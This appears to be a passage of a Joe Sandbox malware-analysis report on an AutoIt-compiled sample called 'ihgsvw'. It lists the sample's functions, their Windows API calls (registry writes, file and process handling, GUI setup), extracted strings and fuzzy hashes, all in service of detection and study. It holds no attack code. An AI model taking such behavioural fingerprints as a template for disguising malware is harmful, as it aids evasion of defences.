                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                • String ID: \*.*
                • API String ID: 1946585618-1173974218
                • Opcode ID: 0c62f25ea2f5b246210d044152669be9124a561d6ece8bbc37181d001ba38ac7
                • Instruction ID: 1a9e932a6a7ead8cc80c8928c4a357855a83ccde962a8842833fb4611bdff990
                • Opcode Fuzzy Hash: 0c62f25ea2f5b246210d044152669be9124a561d6ece8bbc37181d001ba38ac7
                • Instruction Fuzzy Hash: 09615B3180524DAACF05EFE4DA42EEDB7B9AF15300F2440A5E452B71A2EB315F09DB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00BE4686), ref: 00C0E397
                • GetFileAttributesW.KERNELBASE(?), ref: 00C0E3A6
                • FindFirstFileW.KERNELBASE(?,?), ref: 00C0E3B7
                • FindClose.KERNEL32(00000000), ref: 00C0E3C3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirstlstrlen
                • String ID:
                • API String ID: 2695905019-0
                • Opcode ID: 18f5f8c43313debc1fae998aa38b7036732437fbce09bca3701ce83138ef35b6
                • Instruction ID: 9fac1adc245312672ff76624c037f6bc7bb23341c3c3607bf2d924f3a62905be
                • Opcode Fuzzy Hash: 18f5f8c43313debc1fae998aa38b7036732437fbce09bca3701ce83138ef35b6
                • Instruction Fuzzy Hash: 21F0ED30465A1067C221673CBC0EAAF7BAD9E42335B104B11F836C30F0EBB0DEA58696
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32(?,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002,00000000), ref: 00BC5099
                • TerminateProcess.KERNEL32(00000000,?,00BC504E,?,00C698D8,0000000C,00BC51A5,?,00000002,00000000), ref: 00BC50A0
                • ExitProcess.KERNEL32 ref: 00BC50B2
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 3a763dccc2defa033d24e5699b6eb92e136c13b59f2a937a3e0b14232fa5b401
                • Instruction ID: 830189fa6eefc7411b7f994353feb975380f124bcceec43f64f98451206b5fe1
                • Opcode Fuzzy Hash: 3a763dccc2defa033d24e5699b6eb92e136c13b59f2a937a3e0b14232fa5b401
                • Instruction Fuzzy Hash: CAE0B631510548AFCF216F64ED09F5C3BB9EB40791F004058F8068A132DB35ED92CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00020D71,00BC077E), ref: 00BC0D6A
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 2fc2a888be0037c420f0ed28d33b0a0276c59aea19e3cced07d0c37cabdd8851
                • Instruction ID: 7f547b40600df6938f3eb48cf832f6b077fecbba2cef6ae69626776dcd398836
                • Opcode Fuzzy Hash: 2fc2a888be0037c420f0ed28d33b0a0276c59aea19e3cced07d0c37cabdd8851
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2CE1C
                • RegCreateKeyExW.KERNELBASE(?,?,00000000,00C3DCD0,00000000,?,00000000,?,?), ref: 00C2CEA3
                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C2CF03
                • _wcslen.LIBCMT ref: 00C2CF53
                • _wcslen.LIBCMT ref: 00C2CFCE
                • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 00C2D011
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C2D120
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C2D1AC
                • RegCloseKey.KERNELBASE(?), ref: 00C2D1E0
                • RegCloseKey.ADVAPI32(00000000), ref: 00C2D1ED
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C2D2BF
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 9721498-966354055
                • Opcode ID: 3b82942b4c3f64935ed67ba690297d359f684bc5f1474510ad019876e5604f8d
                • Instruction ID: 641a31225040d456d05017bb9499b6827898cae7810123c7e5e79d5aa2d8acd8
                • Opcode Fuzzy Hash: 3b82942b4c3f64935ed67ba690297d359f684bc5f1474510ad019876e5604f8d
                • Instruction Fuzzy Hash: E81247356082119FDB14DF24D891B2AB7E5FF89724F14849CF89A9B7A2CB31ED41CB81
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID:
                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                • API String ID: 0-1645009161
                • Opcode ID: ba76f6bb5a9fd66ddfd94915e3cd4422849d7f756e0ab87144f1a47cc03bb38b
                • Instruction ID: 73a90d1844c69e6b69805cfdd538814273dc2337e116b5d6ce4f3ff209735b4b
                • Opcode Fuzzy Hash: ba76f6bb5a9fd66ddfd94915e3cd4422849d7f756e0ab87144f1a47cc03bb38b
                • Instruction Fuzzy Hash: FF812671A48205BFDB10AF61DC46FAE7BE8EF16B00F0440E4F905AA192EB71DB51D7A1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BC0456
                  • Part of subcall function 00BC047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00C7170C,00000FA0,630BFAD0,?,?,?,?,00BE2753,000000FF), ref: 00BC04AC
                  • Part of subcall function 00BC047D: GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BE2753,000000FF), ref: 00BC04B7
                  • Part of subcall function 00BC047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BE2753,000000FF), ref: 00BC04C8
                  • Part of subcall function 00BC047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BC04DE
                  • Part of subcall function 00BC047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BC04EC
                  • Part of subcall function 00BC047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BC04FA
                  • Part of subcall function 00BC047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0525
                  • Part of subcall function 00BC047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0530
                • ___scrt_fastfail.LIBCMT ref: 00BC0477
                  • Part of subcall function 00BC0433: __onexit.LIBCMT ref: 00BC0439
                Strings
                • WakeAllConditionVariable, xrefs: 00BC04F2
                • InitializeConditionVariable, xrefs: 00BC04D8
                • kernel32.dll, xrefs: 00BC04C3
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BC04B2
                • SleepConditionVariableCS, xrefs: 00BC04E4
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 66158676-1714406822
                • Opcode ID: 0931f7e2538518ed53d09393927a8e2de796ba065425f7fc1b994f998592ede5
                • Instruction ID: 7b69f2b09e001a67ee150e5ebbd396ddcb8705134d2b93db20f02d8991298a6a
                • Opcode Fuzzy Hash: 0931f7e2538518ed53d09393927a8e2de796ba065425f7fc1b994f998592ede5
                • Instruction Fuzzy Hash: 9121C332BA4711EBD7147BA8AC46F6E76E4EB04B61F1441ADFA0696290DFB09C008A50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                • String ID:
                • API String ID: 2189390790-0
                • Opcode ID: a20e7cd91c64eecb1226349a1521be315ccb860614f7f3971328a1649584245a
                • Instruction ID: 8d7b7d0cb617300b96b80b7bd38c0fa7f3e1dda3b9d718e621395877e1e8e701
                • Opcode Fuzzy Hash: a20e7cd91c64eecb1226349a1521be315ccb860614f7f3971328a1649584245a
                • Instruction Fuzzy Hash: 4542EE70608342EFDB24CF24C884BBABBE5FF86300F1445A9F56587291D771E988CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00BA35DE
                • RegisterClassExW.USER32 ref: 00BA3608
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA3619
                • InitCommonControlsEx.COMCTL32(?), ref: 00BA3636
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA3646
                • LoadIconW.USER32 ref: 00BA365C
                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA366B
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-1005189915
                • Opcode ID: e416550c3a3098383286c4a93e5eeb07e4e5833d8a97a6f834a4d92f66ddbae4
                • Instruction ID: 3bab716029fef349918e0fee5e3ebde33a8fd591d1422e75c46b16441fedf096
                • Opcode Fuzzy Hash: e416550c3a3098383286c4a93e5eeb07e4e5833d8a97a6f834a4d92f66ddbae4
                • Instruction Fuzzy Hash: 5421CFB1921319AFDB00DFA4EC89B9DBBB8FB09700F00411AF616A62A0D7B55585CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 00BE073A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0AA4,?,?,00000000,?,00BE0AA4,00000000,0000000C), ref: 00BE0757
                • GetLastError.KERNEL32 ref: 00BE0B0F
                • __dosmaperr.LIBCMT ref: 00BE0B16
                • GetFileType.KERNELBASE(00000000), ref: 00BE0B22
                • GetLastError.KERNEL32 ref: 00BE0B2C
                • __dosmaperr.LIBCMT ref: 00BE0B35
                • CloseHandle.KERNEL32(00000000), ref: 00BE0B55
                • CloseHandle.KERNEL32(?), ref: 00BE0C9F
                • GetLastError.KERNEL32 ref: 00BE0CD1
                • __dosmaperr.LIBCMT ref: 00BE0CD8
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: 5602da2e32bb298dab2dabf3ff5b10dd9ce37b1750b7e2331ba4d549e659d639
                • Instruction ID: da28d3e2ccddb2e2b2e5e7a7da34176b017029e4b76d6324873ef2eed8aefe85
                • Opcode Fuzzy Hash: 5602da2e32bb298dab2dabf3ff5b10dd9ce37b1750b7e2331ba4d549e659d639
                • Instruction Fuzzy Hash: A2A13832A141898FDF19AFB8D892BAD7BF1EB06324F14019DF8119B3A1D7709D82CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 00BA551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00BA5539
                  • Part of subcall function 00BA51BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA51E1
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BA534B
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BE4BD7
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BE4C18
                • RegCloseKey.ADVAPI32(?), ref: 00BE4C5A
                • _wcslen.LIBCMT ref: 00BE4CC1
                • _wcslen.LIBCMT ref: 00BE4CD0
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                • API String ID: 98802146-2727554177
                • Opcode ID: e39e1abcf4d7085a487ce1c8dad9246870029a03909c9933d873d6bdf09ecd4d
                • Instruction ID: a60bc6db004405735ec67538f7c24b6b84f1c40283248a27ce50ceb40247b441
                • Opcode Fuzzy Hash: e39e1abcf4d7085a487ce1c8dad9246870029a03909c9933d873d6bdf09ecd4d
                • Instruction Fuzzy Hash: FF717E71518380AEC724EF65E845B6FBBE8FF89340F40046EF449871B1EB709A89DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 00BA3465
                • LoadCursorW.USER32(00000000,00007F00), ref: 00BA3474
                • LoadIconW.USER32 ref: 00BA348A
                • LoadIconW.USER32 ref: 00BA349C
                • LoadIconW.USER32 ref: 00BA34AE
                • LoadImageW.USER32 ref: 00BA34C6
                • RegisterClassExW.USER32 ref: 00BA3517
                  • Part of subcall function 00BA35AB: GetSysColorBrush.USER32(0000000F), ref: 00BA35DE
                  • Part of subcall function 00BA35AB: RegisterClassExW.USER32 ref: 00BA3608
                  • Part of subcall function 00BA35AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA3619
                  • Part of subcall function 00BA35AB: InitCommonControlsEx.COMCTL32(?), ref: 00BA3636
                  • Part of subcall function 00BA35AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA3646
                  • Part of subcall function 00BA35AB: LoadIconW.USER32 ref: 00BA365C
                  • Part of subcall function 00BA35AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA366B
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: 282dc472a8d0a59a0d5fd1793c44585c27289dcca02d987a2f09fcb6b3919a8f
                • Instruction ID: a85c5de229732fa213a3ded03571d8a0d604b437020a9b96b22b2afb3616bf48
                • Opcode Fuzzy Hash: 282dc472a8d0a59a0d5fd1793c44585c27289dcca02d987a2f09fcb6b3919a8f
                • Instruction Fuzzy Hash: 1F212C71D10318ABDB109FA5EC55BAD7FFCFB48B50F00401AF609A62B0D7B945859F90
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                  • Part of subcall function 00BA7953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,00BE3A1C), ref: 00BA7973
                  • Part of subcall function 00BA6E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA3B33,?,00008000), ref: 00BA6E80
                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00BA3C17
                • _wcslen.LIBCMT ref: 00BA3C96
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA3D81
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                • API String ID: 2701412040-3738523708
                • Opcode ID: 44ccdb89454ad6c31807334a609c6bfc2ad5d57519997ab37d010a233b31ca5f
                • Instruction ID: b2565f892e80a22af2326c7f2e797d44a3a23d20959303b7bd01416c40258767
                • Opcode Fuzzy Hash: 44ccdb89454ad6c31807334a609c6bfc2ad5d57519997ab37d010a233b31ca5f
                • Instruction Fuzzy Hash: A0227E7010C3809FC714EF24C881AAFBBE5EF96314F0409ADF595972A2DB70DA48DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BA3690,?,?), ref: 00BA36FE
                • KillTimer.USER32(?,00000001,?,?,?,?,?,00BA3690,?,?), ref: 00BA372A
                • SetTimer.USER32 ref: 00BA374D
                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BA3690,?,?), ref: 00BA3758
                • CreatePopupMenu.USER32(?,?,?,?,?,00BA3690,?,?), ref: 00BA376C
                • PostQuitMessage.USER32(00000000), ref: 00BA378D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmp
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                • String ID: TaskbarCreated
                • API String ID: 129472671-2362178303
                • Opcode ID: 32e1a800dbe1b318959c85557bd96627d2255d58d5fe341c2580b6a2c82a6662
                • Instruction ID: a55954b4072252cb9a1592466551fa212336ae475b8863b4e3a60f4a81fc92fb
                • Opcode Fuzzy Hash: 32e1a800dbe1b318959c85557bd96627d2255d58d5fe341c2580b6a2c82a6662
                • Instruction Fuzzy Hash: 89412AF121C144BBDB241B38DC8EF7D3AD9E747B10F0442A9F50A8A2A5CB759F809761
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00BA2A9B
                • OleUninitialize.OLE32(?,00000000), ref: 00BA2B3A
